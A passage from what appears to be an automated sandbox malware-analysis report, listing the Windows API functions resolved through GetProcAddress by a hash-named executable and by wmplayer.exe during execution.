(UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter OpenServiceA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter NotifyServiceStatusChangeA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter NsiAllocateAndGetTable (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CM_Open_Class_Key_ExW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter NsiFreeTable (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005796)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetCurrentProcessExplicitAppUserModelID (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter InterlockedCompareExchange (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter PathGetCharTypeW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoInitializeSecurity (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetVolumeNameForVolumeMountPointW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegisterApplicationRestart (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DwmExtendFrameIntoClientArea (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DwmSetWindowAttribute (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DwmSetIconicThumbnail (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DwmSetIconicLivePreviewBitmap (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DwmInvalidateIconicBitmaps (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter InterlockedPopEntrySList (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter InterlockedPushEntrySList (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MonitorFromRect (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MonitorFromPoint (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SHGetSpecialFolderLocation (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SHGetPathFromIDListW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SHGetMalloc (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetNamedSecurityInfoW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetNamedSecurityInfoW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoCreateFreeThreadedMarshaler (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetupDiCreateDeviceInfoList (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CMP_RegisterNotification (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CM_MapCrToWin32Err (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetupDiGetClassDevsExW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetupDiEnumDeviceInfo (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreatePropertyStore (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter PropVariantClear (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter NetUserGetLocalGroups (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter NetApiBufferFree (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter timeBeginPeriod (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter timeGetTime (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetWindowInfo (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetAncestor (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesA (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ExtTextOutW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetWindowThemeAttribute (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ResolveDelayLoadedAPI (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoGetObjectContext (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32RedirectTypeLibrary (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegQueryValueW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32MapConfiguredClsidToReferenceClsid (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter WTSQuerySessionInformationW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter WinStationIsSessionRemoteable (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreateWellKnownSid (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter NdrClientCall2 (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter WTSFreeMemory (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DrawThemeTextEx (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter OpenThemeData (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultUILanguage (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegisterClassNameW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EnableThemeDialogTexture (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemeBool (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter IsThemePartDefined (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemeColor (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemeMargins (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemeFont (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetWindowTheme (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CloseThemeData (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemePartSize (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundExtent (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImageList_Create (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImageList_ReplaceIcon (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemeTextMetrics (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemeTextExtent (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter BufferedPaintInit (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImageList_Destroy (UID: 